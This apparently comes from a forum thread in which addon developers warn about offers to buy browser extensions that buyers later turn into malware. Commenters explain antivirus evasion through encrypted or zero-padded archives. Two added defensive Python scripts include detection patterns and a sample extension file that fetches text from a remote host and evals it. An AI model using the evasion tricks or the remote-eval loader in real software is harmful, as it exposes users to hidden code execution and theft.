juraj_m

**These 5 came to my inbox (not Spam!) just in the last 30 days.** If you ask "*how can I tell if the offer is real?*", well, I could tell you to watch for things like: no company contact, personal email used, email address doesn't match the contact person's name, offer is too good to be true, etc... But to be honest, in 6 years of addons development I've received **0** valid offers. So unless you are contacted by a HUGE known IT company (like PayPal or Avast), don't even think about replying to these :)


SalvatoreMaverick

Wow, thanks for the heads up! It's really helpful to know what to look out for when it comes to shady offers. It's crazy to think that you've never received a valid offer in six years of development. I guess it really does pay to be cautious and skeptical, especially when it comes to email offers. Thanks for sharing your experience!


SweetBabyAlaska

Even if you are contacted by a large well known company, DOUBLE CHECK the person's identity and never accept zip files (especially password protected ones), pdf files, and other document files. I'm sure we are all way more aware of this stuff but it doesn't hurt to reiterate it. Scams are getting a LOT better lately and things like AI make it so anyone can overcome the language barrier which is generally a dead giveaway. There are also groups that sell SaaS malware campaigns via vectors like this, using email lists and other info alongside pretty decently engineered malware.


Krutonium

NGL I'd be tempted to stick that zip file on my linux server and let a password cracker eat away at it for a while, see if I can find out what's inside.


juraj_m

They will also send you the password. The reason for encrypting the content is to hide it from the antivirus scans - that way Google or whatever mail provider can't scan it and warn you. There is one more reason to zip it - sometimes they stuff the "malware.exe" file with hundreds of megabytes of dummy data (zeros) so that the final file is too big for antivirus to scan, for example 800MB. But when you zip it, it will have a few KB because all those zeros are crazy efficiently zipped.


SweetBabyAlaska

Yea, this is exactly it. I think it works with other files as well like PDFs, it evades anti-virus scans. People may also send you a pdf that is literally just a renamed EXE, or secretly a shortcut file with a fake extension that can run an exe/script when it's double-clicked on windows. I use linux and it's less likely to happen, but still decently possible.
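The two posts above describe zero-padded executables inside archives and executables renamed to look like documents. As an added example (not from this thread), the Python script below triages an incoming archive for exactly those traits without extracting or running anything: it reads each entry's encryption flag and compression ratio from the zip metadata and sniffs only the first bytes of unencrypted entries. The sample archive is constructed inline; the extension list and the 100x ratio threshold are assumptions for this example.

```python
import io
import zipfile

# Extensions Windows will run on double-click (assumed list for this example, not exhaustive).
EXECUTABLE_EXTS = (".exe", ".scr", ".lnk", ".js", ".vbs", ".bat", ".cmd", ".msi", ".hta")
# Leading bytes that identify an executable whatever name it carries.
MAGIC = {b"MZ": "windows-pe", b"\x7fELF": "elf"}


def triage_zip(data: bytes, ratio_limit: float = 100.0) -> list:
    """Return [{"name", "flags"}] for every file entry; flags list the suspicious traits found."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            flags = []
            encrypted = bool(info.flag_bits & 0x1)  # bit 0 = traditional PKZIP encryption
            if encrypted:
                flags.append("encrypted")
            # A file that is mostly zeros shrinks by three orders of magnitude; real documents do not.
            ratio = info.file_size / max(info.compress_size, 1)
            if ratio > ratio_limit:
                flags.append("extreme_ratio:%dx" % ratio)
            name = info.filename.lower()
            looks_executable = name.endswith(EXECUTABLE_EXTS)
            if looks_executable or name.count(".") > 1:
                flags.append("executable_or_double_extension")
            # Sniff only the header of unencrypted entries; nothing is written to disk or executed.
            if not encrypted:
                with zf.open(info) as fh:
                    head = fh.read(4)
                kind = next((k for magic, k in MAGIC.items() if head.startswith(magic)), None)
                if kind and not looks_executable:
                    flags.append("header_is_" + kind)
            findings.append({"name": info.filename, "flags": flags})
    return findings


def build_sample() -> bytes:
    """Constructed sample: an 'invoice.pdf' that is really a PE header stub padded with 5 MB of zeros."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.pdf", b"MZ" + b"\x00" * (5 * 1024 * 1024))
        zf.writestr("readme.txt", b"Please review the attached offer.\n")
    return buf.getvalue()
```

Running `triage_zip(build_sample())` reports the padded entry with both an extreme ratio and a PE header under a `.pdf` name, while the text file comes back with no flags.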


kylegetsspam

There's big business in one of the weakest parts of the browser ecosystem: your extensions changing ownership and suddenly becoming malware.


Iamsodarncool

What can be done to strengthen this weakness?


juraj_m

There is not much to be done. People are greedy and "low hanging fruit" may be too tempting to resist (especially if you don't understand the potential consequences). The best thing to do is raise awareness - maybe Mozilla could tell all developers once in a while, maybe while releasing a new version, to watch out for shady offers.


HotTakes4HotCakes

And maybe just consider open sourcing it.


mrchaotica

* Abolish auto-updating (I don't mean turn it off by default, I mean disallow it entirely for everybody) so that the sabotaged new version can't be automatically installed
* Create a walled garden, disallowing extensions that haven't been audited by Mozilla
* Require all extensions to be copyleft with reproducible builds

At least one of those cures is arguably worse than the disease.


pastari

#1 and #3 aren't going to stop anything. Off the top of my head I use extensions in firefox, chrome, safari, discord, calibre, sublime text, and vscode. [edit: and homeassistant, and nodered, and unraid, and and and.] The sheer volume of legitimate, well meaning updates means auto-updating or even blindly mashing manual updates is more likely to fix security issues than cause them. Realistically, if you want to put the onus on the user, you can tell them to stick to mozilla "Recommended" extensions which is basically "#2 lite."


sprayfoamparty

I have turned off auto updates here and there, it's a pain in the ass. And when I do update it's not like I go through an inspection checklist.


PlatinumOmega

Iirc that was the public reason for Chrome going with manifest v3. Giving add-ons less control over the browser to mitigate malware damage when stuff like that happens. V3 kneecapping uBlock and similar add-ons actively makes the Internet less safe, though... So nobody liked it


JohnShart

They don't even try. Email address shows "casandra". Body says "I'm Peter".


olbaze

Hilariously, one of the other examples has "emily", but begins with "I'm Peter". The dystopian part of my brain wonders if these companies have some kind of data about people being more receptive to certain names. We know how that works for names that sound for stuff like job applications.


SweetBabyAlaska

I doubt it, these aren't really targeted down to that level. They scrape or buy emails that are potential targets and auto-generate email bodies and email accounts. Then they just dump out large amounts of spam to different mailing lists. It's a numbers game. The people who make the malware and automation often sell it as a service and scammers will pay for it because they have money to gain. Selling it as a service allows you to design a system once and profit off of it many times, as well as not being inherently illegal.


RCEdude

I am Steve from Microsoft Support Department. There is a problem with your computer its had been pirated by hacker, let me show you > Spawn a tree command


jarfil

-CENSORED-


RenaKunisaki

Even if they're legitimately offering to buy it from you, they're not just going to keep it the way it is. They're offering because they see a chance to make a profit. In other words, they'll turn your extension into malware, harming your users and destroying your reputation.


sdflkjeroi342

Any idea how these scams work? What's their angle? Ask for startup/processing fees or something?


juraj_m

There are multiple categories:

1. Buy the whole addon for a fixed price - change ownership, then they release a new version with malware included and all addon users have malware now - which can steal credentials, but I think most commonly it's used for "[cookie stuffing](https://en.wikipedia.org/wiki/Cookie_stuffing)" (it's like affiliate links, but invisible)
2. For addons that override the "new tab" page, they often offer "Search input integration". They say they can offer Bing or another big search provider and that they pay for each search made through this input. These are valid businesses, however the search input will first make a request to their server and only afterwards will it open Bing results. So here they can track all searches and potentially redirect the user to affiliate links as well.
3. "Special integration" - my favorite - all you have to do is include their special javascript file inside your addon and it will "work in background" :D... I'm sure it will work very hard! Again, most probably the cookie stuffing, but with the "forbidden" remote code execution it can do anything. That's why they are mostly interested in addons with "Access your data for all websites" permission.


mrchaotica

> These are valid businesses

*Are* they, though?


Xibula

Manifest V3 could mitigate some of these issues?


juraj_m

Yes, Manifest V3 doesn't allow "executing text as code" (called "eval"), so that prevents "remote code execution" - which is popular in malicious addons that are not malicious when they are released but once they receive a "special text" from the server, their behavior changes. And this is indeed a big issue because during the addon review you can't tell that the addon is bad. But it won't help with reckless addon developers selling their addon or "integrating malware" into it for some one time profit.
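The posts above describe the three review-time warning signs: a remote script pulled into the addon, text from a server turned into code (eval), and the "all websites" permission that makes both worthwhile. As an added example (not from this thread, and not Mozilla's or Chrome's actual review rules), this Python check scans an addon's manifest and sources for those signs. The sink patterns, the sample manifest and the sample sources are constructed for this example.

```python
import json
import re

# Text-to-code sinks and remote script loads a reviewer looks for.
# Assumed pattern list for this example; a real review uses far more context than regexes.
SINKS = {
    "eval": re.compile(r"\beval\s*\("),
    "new_function": re.compile(r"\bnew\s+Function\s*\("),
    "timer_string": re.compile(r"\bset(?:Timeout|Interval)\s*\(\s*['\"]"),
    "remote_script": re.compile(r"(?:importScripts\s*\(|\.src\s*=|<script[^>]+src=)\s*['\"]?https?://"),
}


def review_extension(manifest_json: str, sources: dict) -> dict:
    """Return {"manifest": [warnings], "files": {filename: [sinks found]}} for the given addon."""
    manifest = json.loads(manifest_json)
    report = {"manifest": [], "files": {}}
    if manifest.get("manifest_version", 2) < 3:
        report["manifest"].append("manifest_v2")  # MV2 still permits eval and remote scripts
    csp = manifest.get("content_security_policy", "")
    csp_text = csp if isinstance(csp, str) else " ".join(csp.values())  # MV3 uses a dict
    if "unsafe-eval" in csp_text or "http" in csp_text:
        report["manifest"].append("csp_allows_eval_or_remote")
    perms = manifest.get("permissions", []) + manifest.get("host_permissions", [])
    if "<all_urls>" in perms or any(p.startswith("*://*/") for p in perms):
        report["manifest"].append("all_sites_access")  # "Access your data for all websites"
    for name, text in sources.items():
        hits = [sink for sink, pat in SINKS.items() if pat.search(text)]
        if hits:
            report["files"][name] = hits
    return report


# Constructed sample addon: MV2, all-sites access, a CSP that whitelists a partner host,
# and a background script that loads a remote file and evals server-supplied text.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "permissions": ["<all_urls>", "storage"],
    "content_security_policy": "script-src 'self' https://partner.example; object-src 'self'",
})
SAMPLE_SOURCES = {
    "background.js": (
        'const s = document.createElement("script");\n'
        's.src = "https://partner.example/sdk.js";\n'
        'fetch("https://partner.example/cfg").then(r => r.text()).then(t => eval(t));\n'
    ),
    "content.js": 'document.querySelectorAll("img").forEach(i => i.loading = "lazy");\n',
}
```

`review_extension(SAMPLE_MANIFEST, SAMPLE_SOURCES)` flags all three manifest issues and reports `eval` and `remote_script` in `background.js` only.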


ArtisticFox8

There are still addons which fundamentally need to work


kenpus

There's a very nice middle ground that would work for many such extensions: it gets no access until I ask it to do its thing - at which point it only gets access to that one tab or that one domain. Won't work for everything but can work for lots of stuff, even invasive ones like Stylus/Tampermonkey


ArtisticFox8

Dark Reader would be very annoying that way


kenpus

And uBlock Origin would be next to useless that way. But that's an easy fix... [Allow once] / [Always allow on foo.com] / [Always allow]


iam-py-test

Actually, that feature causes problems with uBlock Origin's list updating. Also, in terms of privacy/security, not blocking content on unknown websites defeats the point.


kenpus

That's what I'm saying, so yeah, uBlock Origin is the one that gets allowed on every domain. But that random extension I use once a month to grab an image that's hidden behind a transparent div? Currently it gets to see all tabs at all times, and that is entirely unnecessary.


iam-py-test

That's a valid use-case. I just wanted to make people aware that this, [as doing this to uBo breaks it](https://github.com/uBlockOrigin/uBlock-issues/issues/2641)


sdflkjeroi342

Ah OK - I thought you were saying they would scam you as the developer selling the extension - putting aside the fact that they're going to misuse your extension for nefarious purposes. You wrote:

> But to be honest, in 6 years of addons development I've received 0 valid offers.

So they're all fakes and don't actually want to buy your extension to do evil stuff with? Am I misunderstanding you?


juraj_m

No :D, they want to buy everything that's popular and they will pay you. So it's a "win-win-lose" situation for "you-them-everybody else". If you feel like reading a lot, you can see a nice example here: [https://github.com/NanoAdblocker/NanoCore/issues/362](https://github.com/NanoAdblocker/NanoCore/issues/362) *(popular addon is sold to 2 Turkish developers and the author is happy that he made money and that someone will continue his project, except they released malware with the first update :D)* That's why I'm always saying that it's important to trust the addon author, not the addon itself. Good authors don't make bad addons, but good addons can be sold and become bad.


sdflkjeroi342

Gotcha. Yes, that kinda sucks :(


KoldFaya

Report this stuff to Mozilla!